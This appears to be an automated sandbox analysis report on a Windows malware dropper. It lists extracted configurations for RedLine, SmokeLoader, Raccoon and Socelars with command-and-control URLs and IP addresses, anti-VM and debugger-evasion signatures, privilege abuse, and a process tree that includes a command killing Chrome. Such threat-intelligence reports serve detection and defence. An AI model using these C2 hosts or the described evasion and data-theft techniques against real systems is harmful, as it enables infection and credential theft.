Analysis
-
max time kernel
92s -
max time network
153s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
19/11/2021, 21:58
Static task
static1
Behavioral task
behavioral1
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win7-en-20211104
Behavioral task
behavioral2
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win10-en-20211014
General
-
Target
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
-
Size
403KB
-
MD5
f957e397e71010885b67f2afe37d8161
-
SHA1
a8bf84b971b37ac6e7f66c5e5a7e971a7741401e
-
SHA256
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66
-
SHA512
8b5e9cb926fafc295c403c1fce7aa883db3a327e58c3295e9a081a8937bed28e305cca08c2c7d98080818095ea99bb4047e10aa2f61e3e4d6d965aef6d16a4f6
Malware Config
Extracted
socelars
http://www.gianninidesign.com/
Extracted
redline
555
91.206.14.151:64591
Extracted
smokeloader
2020
http://membro.at/upload/
http://jeevanpunetha.com/upload/
http://misipu.cn/upload/
http://zavodooo.ru/upload/
http://targiko.ru/upload/
http://vues3d.com/upload/
Extracted
metasploit
windows/single_exec
Extracted
redline
udptest
193.56.146.64:65441
Extracted
redline
bbbb
37.9.13.169:63912
Extracted
raccoon
1.8.3-hotfix
ddf183af4241e3172885cf1b2c4c1fb4ee03d05a
-
url4cnc
http://91.219.236.27/capibar
http://5.181.156.92/capibar
http://91.219.236.207/capibar
http://185.225.19.18/capibar
http://91.219.237.227/capibar
https://t.me/capibar
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 6 IoCs
resource yara_rule behavioral2/memory/2868-263-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/2868-287-0x0000000000418EFE-mapping.dmp family_redline behavioral2/memory/3884-286-0x0000000000418EEE-mapping.dmp family_redline behavioral2/memory/1180-261-0x0000000002580000-0x00000000025AC000-memory.dmp family_redline behavioral2/memory/3884-258-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/1180-235-0x00000000023D0000-0x00000000023FE000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral2/files/0x000400000001abbe-133.dat family_socelars behavioral2/files/0x000400000001abbe-140.dat family_socelars -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Blocklisted process makes network request 1 IoCs
flow pid Process 128 2720 cmd.exe -
Downloads MZ/PE file
-
Executes dropped EXE 25 IoCs
pid Process 2224 LUR58T8ha0SYLkgjopFYszr1.exe 1500 iOQgSJtYCZEln8V8xrIq3YiN.exe 1184 c3jlwI22KyQswLqpMAZMLoNv.exe 2584 ZtQmi64xfNHBdyzqDnGYn0w1.exe 1236 sjP2NNGLkLXmtRLr84FTXoXx.exe 676 sxrRrick3gD4kfxFesJBiP0k.exe 1180 4a_srNM9UohMmVM9bKpDSGS4.exe 2400 Rn16AjUDOEUw_Phj5cpEWNW3.exe 3640 x_aSVw4EDPeHhdDlVBUwnD5i.exe 1316 FvB0vwSDHiNEaiHHprj88QvP.exe 892 jBWeyRHTi62HuqZULFmHBJZQ.exe 1448 PeRBFnMEUcYITSFocoY9fLRF.exe 1232 nAcUXNNobKFMoFFQJ9XOsJ52.exe 2308 TxDbe8aS2EdqwtmMaCuHHaCv.exe 1864 SIv0sTchmQvzTnVJQD4OBmUl.exe 2108 jRu17kZMHmlu09jEcP7j8AiT.exe 1968 Ns_bc3yvvzhDnhFBWNVaCAoA.exe 1964 FgfMTZvTbi4wD01SGlMOF8MG.exe 3896 cS1iPoHMzXj4Y6kY3A6yydrM.exe 2208 4XXl_o0ZoNjiS8c1uCdyespF.exe 3240 WH0lWYx3KsYqWPkVAZlF8sNH.exe 2396 0x6o3hs3eABLDe2nznrTWCcJ.exe 2640 uvSQkFfGlN4hF4GFY7NSg2XG.exe 1104 inst2.exe 3052 nAcUXNNobKFMoFFQJ9XOsJ52.exe -
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Ns_bc3yvvzhDnhFBWNVaCAoA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion SIv0sTchmQvzTnVJQD4OBmUl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0x6o3hs3eABLDe2nznrTWCcJ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4XXl_o0ZoNjiS8c1uCdyespF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Ns_bc3yvvzhDnhFBWNVaCAoA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FgfMTZvTbi4wD01SGlMOF8MG.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FgfMTZvTbi4wD01SGlMOF8MG.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion SIv0sTchmQvzTnVJQD4OBmUl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0x6o3hs3eABLDe2nznrTWCcJ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4XXl_o0ZoNjiS8c1uCdyespF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cS1iPoHMzXj4Y6kY3A6yydrM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion jRu17kZMHmlu09jEcP7j8AiT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion jRu17kZMHmlu09jEcP7j8AiT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cS1iPoHMzXj4Y6kY3A6yydrM.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/memory/1964-237-0x0000000000D80000-0x0000000000D81000-memory.dmp themida behavioral2/memory/1968-226-0x0000000001060000-0x0000000001061000-memory.dmp themida behavioral2/files/0x000600000001abe9-431.dat themida behavioral2/files/0x000600000001abe9-429.dat themida behavioral2/memory/2396-218-0x00000000013B0000-0x00000000013B1000-memory.dmp themida behavioral2/memory/2208-217-0x0000000000DB0000-0x0000000000DB1000-memory.dmp themida behavioral2/files/0x000400000001abf0-444.dat themida behavioral2/memory/3896-207-0x0000000000100000-0x0000000000101000-memory.dmp themida behavioral2/files/0x000500000001abe4-181.dat themida behavioral2/files/0x000500000001abe4-180.dat themida behavioral2/files/0x000400000001abe0-177.dat themida behavioral2/files/0x000400000001abe0-176.dat themida behavioral2/files/0x000200000001abdb-175.dat themida behavioral2/files/0x000600000001abdd-171.dat themida behavioral2/files/0x000200000001abdb-174.dat themida behavioral2/files/0x000700000001abcd-172.dat themida behavioral2/files/0x000600000001abdd-170.dat themida -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4XXl_o0ZoNjiS8c1uCdyespF.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Ns_bc3yvvzhDnhFBWNVaCAoA.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jRu17kZMHmlu09jEcP7j8AiT.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SIv0sTchmQvzTnVJQD4OBmUl.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cS1iPoHMzXj4Y6kY3A6yydrM.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA FgfMTZvTbi4wD01SGlMOF8MG.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 0x6o3hs3eABLDe2nznrTWCcJ.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 130 ipinfo.io 131 ipinfo.io 141 ip-api.com 176 ipinfo.io 34 ipinfo.io 35 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 2396 0x6o3hs3eABLDe2nznrTWCcJ.exe 3896 cS1iPoHMzXj4Y6kY3A6yydrM.exe 2208 4XXl_o0ZoNjiS8c1uCdyespF.exe 1968 Ns_bc3yvvzhDnhFBWNVaCAoA.exe 1964 FgfMTZvTbi4wD01SGlMOF8MG.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1232 set thread context of 3052 1232 nAcUXNNobKFMoFFQJ9XOsJ52.exe 94 -
Drops file in Program Files directory 7 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe x_aSVw4EDPeHhdDlVBUwnD5i.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\rtst1039.exe x_aSVw4EDPeHhdDlVBUwnD5i.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe x_aSVw4EDPeHhdDlVBUwnD5i.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini x_aSVw4EDPeHhdDlVBUwnD5i.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe iOQgSJtYCZEln8V8xrIq3YiN.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe iOQgSJtYCZEln8V8xrIq3YiN.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\inst2.exe x_aSVw4EDPeHhdDlVBUwnD5i.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 9 IoCs
pid pid_target Process procid_target 1536 2584 WerFault.exe 74 4760 2584 WerFault.exe 74 4584 2584 WerFault.exe 74 5008 2584 WerFault.exe 74 4252 2584 WerFault.exe 74 4212 2108 WerFault.exe 90 4380 2584 WerFault.exe 74 3320 2640 WerFault.exe 83 4068 3240 WerFault.exe 84 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI FvB0vwSDHiNEaiHHprj88QvP.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI FvB0vwSDHiNEaiHHprj88QvP.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI FvB0vwSDHiNEaiHHprj88QvP.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4868 schtasks.exe 4900 schtasks.exe -
Kills process with taskkill 4 IoCs
pid Process 5612 taskkill.exe 5904 taskkill.exe 5764 taskkill.exe 5160 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe 2224 LUR58T8ha0SYLkgjopFYszr1.exe -
Suspicious use of AdjustPrivilegeToken 40 IoCs
description pid Process Token: SeCreateTokenPrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeAssignPrimaryTokenPrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeLockMemoryPrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeIncreaseQuotaPrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeMachineAccountPrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeTcbPrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeSecurityPrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeTakeOwnershipPrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeLoadDriverPrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeSystemProfilePrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeSystemtimePrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeProfSingleProcessPrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeIncBasePriorityPrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeCreatePagefilePrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeCreatePermanentPrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeBackupPrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeRestorePrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeShutdownPrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeDebugPrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeAuditPrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeSystemEnvironmentPrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeChangeNotifyPrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeRemoteShutdownPrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeUndockPrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeSyncAgentPrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeEnableDelegationPrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeManageVolumePrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeImpersonatePrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeCreateGlobalPrivilege 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: 31 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: 32 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: 33 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: 34 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: 35 676 sxrRrick3gD4kfxFesJBiP0k.exe Token: SeRestorePrivilege 3320 WerFault.exe Token: SeBackupPrivilege 3320 WerFault.exe Token: SeRestorePrivilege 4068 WerFault.exe Token: SeBackupPrivilege 4068 WerFault.exe Token: SeBackupPrivilege 4068 WerFault.exe Token: SeDebugPrivilege 4068 WerFault.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2720 wrote to memory of 2224 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 69 PID 2720 wrote to memory of 2224 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 69 PID 2720 wrote to memory of 1500 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 70 PID 2720 wrote to memory of 1500 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 70 PID 2720 wrote to memory of 1500 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 70 PID 2720 wrote to memory of 1184 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 71 PID 2720 wrote to memory of 1184 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 71 PID 2720 wrote to memory of 1184 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 71 PID 2720 wrote to memory of 2584 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 74 PID 2720 wrote to memory of 2584 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 74 PID 2720 wrote to memory of 2584 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 74 PID 2720 wrote to memory of 1236 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 72 PID 2720 wrote to memory of 1236 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 72 PID 2720 wrote to memory of 1236 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 72 PID 2720 wrote to memory of 2400 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 76 PID 2720 wrote to memory of 2400 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 76 PID 2720 wrote to memory of 2400 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 76 PID 2720 wrote to memory of 1180 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 75 PID 2720 wrote to memory of 1180 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 75 PID 2720 wrote to memory of 1180 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 75 PID 2720 wrote to memory of 676 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 77 PID 2720 wrote to memory of 676 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 77 PID 2720 wrote to memory of 676 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 77 PID 2720 wrote to memory of 3640 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 81 PID 2720 wrote to memory of 3640 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 81 PID 2720 wrote to memory of 3640 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 81 PID 2720 wrote to memory of 1316 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 80 PID 2720 wrote to memory of 1316 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 80 PID 2720 wrote to memory of 1316 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 80 PID 2720 wrote to memory of 892 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 79 PID 2720 wrote to memory of 892 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 79 PID 2720 wrote to memory of 1448 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 78 PID 2720 wrote to memory of 1448 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 78 PID 2720 wrote to memory of 1448 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 78 PID 2720 wrote to memory of 1232 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 82 PID 2720 wrote to memory of 1232 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 82 PID 2720 wrote to memory of 1232 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 82 PID 2720 wrote to memory of 2308 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 92 PID 2720 wrote to memory of 2308 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 92 PID 2720 wrote to memory of 2308 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 92 PID 2720 wrote to memory of 1864 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 91 PID 2720 wrote to memory of 1864 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 91 PID 2720 wrote to memory of 1864 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 91 PID 2720 wrote to memory of 2108 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 90 PID 2720 wrote to memory of 2108 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 90 PID 2720 wrote to memory of 2108 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 90 PID 2720 wrote to memory of 1964 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 89 PID 2720 wrote to memory of 1964 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 89 PID 2720 wrote to memory of 1964 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 89 PID 2720 wrote to memory of 1968 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 88 PID 2720 wrote to memory of 1968 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 88 PID 2720 wrote to memory of 1968 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 88 PID 2720 wrote to memory of 3896 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 87 PID 2720 wrote to memory of 3896 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 87 PID 2720 wrote to memory of 3896 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 87 PID 2720 wrote to memory of 2208 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 86 PID 2720 wrote to memory of 2208 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 86 PID 2720 wrote to memory of 2208 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 86 PID 2720 wrote to memory of 2396 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 85 PID 2720 wrote to memory of 2396 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 85 PID 2720 wrote to memory of 2396 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 85 PID 2720 wrote to memory of 3240 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 84 PID 2720 wrote to memory of 3240 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 84 PID 2720 wrote to memory of 3240 2720 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 84
Processes
-
C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Users\Admin\Pictures\Adobe Films\LUR58T8ha0SYLkgjopFYszr1.exe"C:\Users\Admin\Pictures\Adobe Films\LUR58T8ha0SYLkgjopFYszr1.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2224
-
-
C:\Users\Admin\Pictures\Adobe Films\iOQgSJtYCZEln8V8xrIq3YiN.exe"C:\Users\Admin\Pictures\Adobe Films\iOQgSJtYCZEln8V8xrIq3YiN.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1500 -
C:\Users\Admin\Documents\AEbY8UAJWi1MpTVXKD8ohyjZ.exe"C:\Users\Admin\Documents\AEbY8UAJWi1MpTVXKD8ohyjZ.exe"3⤵PID:4840
-
C:\Users\Admin\Pictures\Adobe Films\kl3RAAS6f1tz1p8g3_dRwt1s.exe"C:\Users\Admin\Pictures\Adobe Films\kl3RAAS6f1tz1p8g3_dRwt1s.exe"4⤵PID:4492
-
-
C:\Users\Admin\Pictures\Adobe Films\pZxwNsmoJVuinHL_7isgP_W4.exe"C:\Users\Admin\Pictures\Adobe Films\pZxwNsmoJVuinHL_7isgP_W4.exe"4⤵PID:1540
-
-
C:\Users\Admin\Pictures\Adobe Films\iotJdjs4abKDV9eYu1gdEi0W.exe"C:\Users\Admin\Pictures\Adobe Films\iotJdjs4abKDV9eYu1gdEi0W.exe"4⤵PID:3176
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:5512
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:5904
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\IxEhVnrW48SVjvCjX7vv_cpf.exe"C:\Users\Admin\Pictures\Adobe Films\IxEhVnrW48SVjvCjX7vv_cpf.exe"4⤵PID:2412
-
-
